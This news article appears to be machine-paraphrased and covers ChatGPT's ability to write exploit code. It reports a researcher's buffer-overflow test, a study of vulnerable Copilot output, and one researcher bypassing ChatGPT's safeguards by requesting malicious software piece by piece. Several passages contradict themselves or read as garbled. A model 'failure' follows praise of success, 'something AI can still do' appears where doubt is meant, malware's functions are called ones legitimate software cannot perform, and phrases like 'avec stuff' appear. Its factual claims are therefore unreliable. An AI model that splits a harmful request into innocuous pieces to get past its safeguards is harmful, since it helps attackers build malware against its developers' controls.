ChatGPT Shows A Way Of Using AI To Write Malware

Even the most skilled hackers can take up to an hour to create a script that exploits a software flaw and then infiltrate their target. OpenAI’s ChatGPT can do this in a matter of seconds, scary.

Brendan Dolan–Gavitt, a computer security researcher and professor at New York University, wondered if he could tell the chatbot to write malicious code when OpenAI released their ChatGPT tool last week. He asked the model to solve an easy capture-the-flag problem.

It was an almost unbelievable result. ChatGPT correctly identified the code’s buffer overflow vulnerability and wrote code to exploit it.

ChatGPT faced a simple challenge from Dolan-Gavitt. He presented this to students at the beginning of a vulnerability assessment course. The failure of the model does not inspire confidence in large language models. Large language models provide the foundation for AI bots to respond to human inquiries and write quality code. Dolan-Gavitt noticed the error and asked the model to reexamine it. This time ChatGPT was correct.

ChatGPT could be better at writing code and illustrates many flaws in using AI tools to create code. These models will become more sophisticated and likely to play a more significant role in writing malicious codes.

Professor Dolan Gavitt said, “Code is very much dual-use technology.” “Almost all the things that malware does is something that legitimate software would do.”

He said, “If ChatGPT is not an option, then a model will be able in the next few years to write code for real-world software vulnerabilities.”

Large language models like ChatGPT rely on large amounts of data from the internet and books. GPT-3, for instance, trained nearly 500 billion tokens, then used statistical tools to predict the best way to answer queries. OpenAI calls this a “tens of millions of public repositories,” a large amount of computer code. This data allows the model to imitate highly skilled programmers like those on StackExchange or GitHub.

LLMs pose double-edged cybersecurity risks. These models can generate malicious code, but they also have the potential to introduce vulnerable code. OpenAI is aware of both sides.

OpenAI researchers examined Codex, the code-writing system that powers GitHub’s Copilot assistant. They found that it could produce “vulnerable or misaligned” code. While future code generation models might be able “to produce more secure code than the average programmer,” they are “far from certain.”

Researchers added that Codex, which descends from ChatGPT’s model, could be “misused” to help cybercrime. However, the current capabilities of Codex “do not materially lower barriers to entry for malware developer.” OpenAI CEO Sam Altman mentioned cybersecurity as one of the main risks of a “powerful AI.”

OpenAI didn’t respond to questions regarding cybersecurity concerns with ChatGPT, nor did Altman have any thoughts about the future cybersecurity threats posed by AI.

Stephen Tong, security researcher and founder at cybersecurity firm Zellic, said, “I think it is good at coming up with avec stuff that’s ninety percent correct.” “You know people don’t know how to code but copy-paste from Stack Overflow, and it works?” It’s like that.

LLMs in software engineering poses a significant risk to destructive code created by AI assistants. LLMs can replicate code errors that AI assistants learn from and incorporate them into code widely used.

The security performance of Copilot, which OpenAI technology powers, was evaluated in a dismal study. Researchers presented Copilot with 89 scenarios that were relevant to security and produced nearly 1,700 programs. About 40% of these programs were potentially vulnerable.

This code might be comparable to what a human would create. Is it any worse than what a first-year software engineering intern would produce? Hammond Pearce, an NYU computer science professor, co-authored the study with Dolan Gavitt and other researchers.

Programmers should therefore be cautious about the code generated by an AI assistant. An attacker could easily exploit these errors.

ChatGPT became incredibly popular within a matter of weeks after its introduction. However, it is now producing so many errors that it has been removed from Stack Overflow’s Q&A forum. ChatGPT answers have a high error rate, but they are often easy to produce,” said the moderators in an announcement.

LLMs could then be used to create malicious code that exploits existing vulnerabilities.

Cybersecurity researchers remain skeptical that large language models can be used to create innovative malicious code because they rely on existing data. Matt Suiche, Magnet Forensics’ director of memory, incident response, and R&D, said that writing exploits, particularly modern ones, require creating and using new techniques. This is something AI can still do.

OpenAI is aware that ChatGPT could be used for exploit writing. OpenAI has set up safeguards to prevent ChatGPT from being used to create malware. ChatGPT tells users that creating or using exploits for Apple’s iPhone is illegal and can harm systems and individuals.

These restrictions could be better. Malicious software can perform functions that legitimate software cannot, such as making network connections and encrypting files’ contents. LLMs are vulnerable to misuse because it is difficult to distinguish between legitimate and malicious software.

Benjamin Tan, a University of Calgary computer scientist, claimed he could bypass ChatGPT’s safeguards and asked the model to create software piece-by-piece that could be used maliciously. Tan stated that the model needs to realize that when it is put together, it is doing something it shouldn’t.

LLMs may not be able to create their exploits, but they can modify existing malware and create variants. Pearce stated that variants could be created to bypass signature analysis or to imitate code written by another attacker. This would make it harder to attribute attacks.

Large language models will likely be a part of exploit development as they become more common. While it is cheaper and more accessible for attackers to create their exploits, there are good reasons to believe that tools such as ChatGPT will become more critical in exploit development.

Tan’s research focuses on tuning public-available models. He says that if there were enough samples, these models could be trained to detect malware. It all depends on where the training data is located.

Related Stories:

Help Someone By Sharing This Article